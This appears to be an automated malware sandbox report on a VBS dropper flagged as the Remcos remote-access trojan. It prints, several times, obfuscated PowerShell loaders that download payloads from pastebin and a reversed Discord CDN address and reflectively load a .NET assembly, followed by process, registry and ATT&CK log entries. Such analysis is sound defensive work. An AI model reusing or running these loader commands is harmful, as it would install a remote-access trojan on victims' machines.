8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bo?HY?ZQB3?G0?I??9?C??Jw?w?Cc?I??7?CQ?ZwBy?Hg?cwB0?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?Gc?YwBi?Gg?a??g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?ZwBj?GI?a?Bo?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?m?DQ?MgBk?GI?YgBk?GU?YgBl?DU?NwBj?GI?NwBk?GQ?YQBk?DQ?ZQ?4?GI?O??x?Dg?ZQ?1?Dc?YQBj?Dk?OQ?5?Dg?OQBm?GM?MgBi?Dk?Yg?2?DM?OQ?x?GE?NQ?1?GI?M?Bi?DI?Z?Bm?GQ?ZQ?4?GU?Z?Bk?GQ?NQBl?DE?PQBt?Gg?JgBh?GU?M??z?DI?Mg?3?DY?PQBz?Gk?JgBh?DY?Mg?4?DM?Mg?3?DY?PQB4?GU?PwB0?Hg?d??u?DI?ZQB0?HM?ZQ?v?DM?MQ?x?Dc?M??4?DY?N??0?DI?Mg?x?D??Ng?z?Dk?OQ?y?DE?Lw?x?DI?Nw?4?DU?O??3?DI?NQ?4?Dk?M??x?Dg?Mw?3?Dg?MQ?x?C8?cwB0?G4?ZQBt?Gg?YwBh?HQ?d?Bh?C8?bQBv?GM?LgBw?H??YQBk?HI?bwBj?HM?aQBk?C4?bgBk?GM?Lw?v?Do?cwBw?HQ?d?Bo?Cc?I??s?C??J?Bn?HI?e?Bz?HQ?I??s?C??JwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?LQ?t?C0?LQ?t?C0?LQ?n?Cw?I??k?Gg?dgBl?Hc?bQ?s?C??Jw?x?Cc?L??g?Cc?UgBv?GQ?YQ?n?C??KQ?p?Ds?';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.rJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$hvewm = '0' ;$grxst = 'C:\Users\user\Desktop\segura.vbs' ;[Byte[]] $gcbhh = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($gcbhh).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'Roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /cJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat textJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bo?hy?zqb3?g0?i??9?c??jw?w?cc?i??7?cq?zwby?hg?cwb0?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gc?ywbi?gg?a??g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?zwbj?gi?a?bo?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?m?dq?mgbk?gi?ygbk?gu?ygbl?du?nwbj?gi?nwbk?gq?yqbk?dq?zq?4?gi?o??x?dg?zq?1?dc?yqbj?dk?oq?5?dg?oqbm?gm?mgbi?dk?yg?2?dm?oq?x?ge?nq?1?gi?m?bi?di?z?bm?gq?zq?4?gu?z?bk?gq?nqbl?de?pqbt?gg?jgbh?gu?m??z?di?mg?3?dy?pqbz?gk?jgbh?dy?mg?4?dm?mg?3?dy?pqb4?gu?pwb0?hg?d??u?di?zqb0?hm?zq?v?dm?mq?x?dc?m??4?dy?n??0?di?mg?x?d??ng?z?dk?oq?y?de?lw?x?di?nw?4?du?o??3?di?nq?4?dk?m??x?dg?mw?3?dg?mq?x?c8?cwb0?g4?zqbt?gg?ywbh?hq?d?bh?c8?bqbv?gm?lgbw?h??yqbk?hi?bwbj?hm?aqbk?c4?bgbk?gm?lw?v?do?cwbw?hq?d?bo?cc?i??s?c??j?bn?hi?e?bz?hq?i??s?c??jwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?gg?dgbl?hc?bq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.r
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$hvewm = '0' ;$grxst = 'c:\users\user\desktop\segura.vbs' ;[byte[]] $gcbhh = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($gcbhh).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'roda' ));"
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat text
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" $iujujjzz = 'wwbt?hk?cwb0?gu?bq?u?e4?zqb0?c4?uwbl?hi?dgbp?gm?zqbq?g8?aqbu?hq?tqbh?g4?yqbn?gu?cgbd?do?ogbt?gu?ywb1?hi?aqb0?hk?u?by?g8?d?bv?gm?bwbs?c??pq?g?fs?uwb5?hm?d?bl?g0?lgbo?gu?d??u?fm?zqbj?hu?cgbp?hq?eqbq?hi?bwb0?g8?ywbv?gw?v?b5?h??zqbd?do?ogbu?gw?cw?x?di?ow?k?em?qwbs?gg?bq?g?d0?i??n?gg?d?b0?h??cw?6?c8?lwbw?ge?cwb0?gu?ygbp?g4?lgbj?g8?bq?v?hi?yqb3?c8?sg?2?hu?ugbq?fo?cgb2?cc?i??7?cq?zg?g?d0?i??o?fs?uwb5?hm?d?bl?g0?lgbj?e8?lgbq?ge?d?bo?f0?og?6?ec?zqb0?fq?zqbt?h??u?bh?hq?a??o?ck?i??r?c??jwbk?gw?b??w?de?lgb0?hg?d??n?ck?i??7?ek?bgb2?g8?awbl?c0?vwbl?gi?ugbl?he?dqbl?hm?d??g?c0?vqbs?ek?i??k?em?qwbs?gg?bq?g?c0?twb1?hq?rgbp?gw?zq?g?cq?zg?g?c0?vqbz?gu?qgbh?hm?aqbj?f??yqby?hm?aqbu?gc?i??7?gm?bqbk?c4?zqb4?gu?i??v?gm?i??7?h??aqbu?gc?i??x?di?nw?u?d??lg?w?c4?mq?g?ds?c?bv?hc?zqby?hm?a?bl?gw?b??u?gu?e?bl?c??lqbj?g8?bqbt?ge?bgbk?c??ew?k?gy?i??9?c??k?bb?fm?eqbz?hq?zqbt?c4?sqbp?c4?u?bh?hq?a?bd?do?ogbh?gu?d?bu?gu?bqbw?f??yqb0?gg?k??p?c??kw?g?cc?z?bs?gw?m??x?c4?d?b4?hq?jw?p?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?sqbu?hy?bwbr?gu?lqbx?gu?ygbs?gu?cqb1?gu?cwb0?c??lqbv?fi?sq?g?cq?uqbq?hq?yqb2?c??lqbp?hu?d?bg?gk?b?bl?c??j?bm?c??lqbv?hm?zqbc?ge?cwbp?gm?u?bh?hi?cwbp?g4?zwb9?c??ow?k?fe?u?b0?ge?dg?g?d0?i??o?c??rwbl?hq?lqbd?g8?bgb0?gu?bgb0?c??lqbq?ge?d?bo?c??j?bm?c??kq?g?ds?j?bo?hy?zqb3?g0?i??9?c??jw?w?cc?i??7?cq?zwby?hg?cwb0?c??pq?g?cc?jqbk?gs?uqbh?hm?r?bm?gc?cgbu?gc?jq?n?c??owbb?ei?eqb0?gu?wwbd?f0?i??k?gc?ywbi?gg?a??g?d0?i?bb?hm?eqbz?hq?zqbt?c4?qwbv?g4?dgbl?hi?d?bd?do?ogbg?hi?bwbt?ei?yqbz?gu?ng?0?fm?d?by?gk?bgbn?cg?i??k?fe?u?b0?ge?dg?u?hi?zqbw?gw?yqbj?gu?k??n?cq?j??n?cw?jwbb?cc?kq?g?ck?i??7?fs?uwb5?hm?d?bl?g0?lgbb?h??c?be?g8?bqbh?gk?bgbd?do?ogbd?hu?cgby?gu?bgb0?eq?bwbt?ge?aqbu?c4?t?bv?ge?z??o?cq?zwbj?gi?a?bo?ck?lgbh?gu?d?bu?hk?c?bl?cg?jwbu?gu?a?b1?gw?ywbo?gu?cwby?hg?w?b4?hg?lgbd?gw?yqbz?hm?mq?n?ck?lgbh?gu?d?bn?gu?d?bo?g8?z??o?cc?tqbz?he?qgbj?gi?wq?n?ck?lgbj?g4?dgbv?gs?zq?o?cq?bgb1?gw?b??s?c??wwbv?gi?agbl?gm?d?bb?f0?xq?g?cg?jw?m?dq?mgbk?gi?ygbk?gu?ygbl?du?nwbj?gi?nwbk?gq?yqbk?dq?zq?4?gi?o??x?dg?zq?1?dc?yqbj?dk?oq?5?dg?oqbm?gm?mgbi?dk?yg?2?dm?oq?x?ge?nq?1?gi?m?bi?di?z?bm?gq?zq?4?gu?z?bk?gq?nqbl?de?pqbt?gg?jgbh?gu?m??z?di?mg?3?dy?pqbz?gk?jgbh?dy?mg?4?dm?mg?3?dy?pqb4?gu?pwb0?hg?d??u?di?zqb0?hm?zq?v?dm?mq?x?dc?m??4?dy?n??0?di?mg?x?d??ng?z?dk?oq?y?de?lw?x?di?nw?4?du?o??3?di?nq?4?dk?m??x?dg?mw?3?dg?mq?x?c8?cwb0?g4?zqbt?gg?ywbh?hq?d?bh?c8?bqbv?gm?lgbw?h??yqbk?hi?bwbj?hm?aqbk?c4?bgbk?gm?lw?v?do?cwbw?hq?d?bo?cc?i??s?c??j?bn?hi?e?bz?hq?i??s?c??jwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?xwbf?f8?lq?t?c0?lq?t?c0?lq?n?cw?i??k?gg?dgbl?hc?bq?s?c??jw?x?cc?l??g?cc?ugbv?gq?yq?n?c??kq?p?ds?';$yolopolhggobek = [system.text.encoding]::unicode.getstring( [system.convert]::frombase64string( $iujujjzz.replace('?','a') ) );$yolopolhggobek = $yolopolhggobek.rJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "[system.net.servicepointmanager]::securityprotocol = [system.net.securityprotocoltype]::tls12;$ccrhm = 'https://pastebin.com/raw/j6urjzrv' ;$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;invoke-webrequest -uri $ccrhm -outfile $f -usebasicparsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([system.io.path]::gettemppath() + 'dll01.txt') ;$qptav = ( get-content -path $f ) ;invoke-webrequest -uri $qptav -outfile $f -usebasicparsing} ;$qptav = ( get-content -path $f ) ;$hvewm = '0' ;$grxst = 'c:\users\user\desktop\segura.vbs' ;[byte[]] $gcbhh = [system.convert]::frombase64string( $qptav.replace('$$','a') ) ;[system.appdomain]::currentdomain.load($gcbhh).gettype('tehulchesxxxxx.class1').getmethod('msqbiby').invoke($null, [object[]] ('&42dbbdebe57cb7ddad4e8b818e57ac99989fc2b9b6391a55b0b2dfde8eddd5e1=mh&ae032276=si&a6283276=xe?txt.2etse/3117086442210639921/1278587258901837811/stnemhcatta/moc.ppadrocsid.ndc//:sptth' , $grxst , '____________________________________________-------', $hvewm, '1', 'roda' ));"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -encodedcommand jabmacaapqagacgawwbtahkacwb0aguabqauaekatwauafaayqb0aggaxqa6adoarwblahqavablag0acabqageadaboacgakqagacsaiaanagqababsadaamqauahqaeab0accakqagadsajabrafaadabhahyaiaa9acaakaagaecazqb0ac0aqwbvag4adablag4adaagac0auabhahqaaaagacqazgagackaiaa7aekabgb2ag8aawblac0avwblagiaugblaheadqblahmadaagac0avqbsaekaiaakafeauab0ageadgagac0atwb1ahqargbpagwazqagacqazgagac0avqbzaguaqgbhahmaaqbjafaayqbyahmaaqbuagca -inputformat xml -outputformat textJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Yara detected Remcos RAT
            Source: Yara matchFile source: 00000004.00000002.2353954151.000002306145D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3460, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information121
            Scripting            		Valid Accounts2
            Command and Scripting Interpreter            		121
            Scripting            		11
